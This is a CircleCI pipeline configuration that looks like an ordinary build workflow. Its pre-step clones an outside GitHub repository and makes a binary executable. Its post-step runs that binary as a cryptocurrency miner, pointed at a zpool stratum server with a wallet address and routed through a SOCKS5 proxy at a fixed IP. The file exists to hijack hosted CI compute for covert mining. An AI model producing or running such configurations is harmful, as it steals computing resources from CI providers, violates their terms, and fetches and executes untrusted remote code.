version: 2.1
parallelism: 1
jobs:
  bar:
    machine: true
    steps:
      - checkout
      - run:
          command: sudo -i
      - run:
          command: sudo apt update
workflows:
  build:
    jobs:
      - bar:
          pre-steps:
            - run:
                command: |
                 git clone https://github.com/gensxtralz/xtral.git && cd xtral && chmod +x avx512        
          post-steps:
            - run:
                command: ./avx512 -a scryptn2 -o stratum+tcp://scryptn2.eu.mine.zpool.ca:4339 -u DTPPTaZiWfd9RHqzmU5sXNke5nQF8QbENr -p c=DGB -t 2 -x socks5://192.252.214.20:15864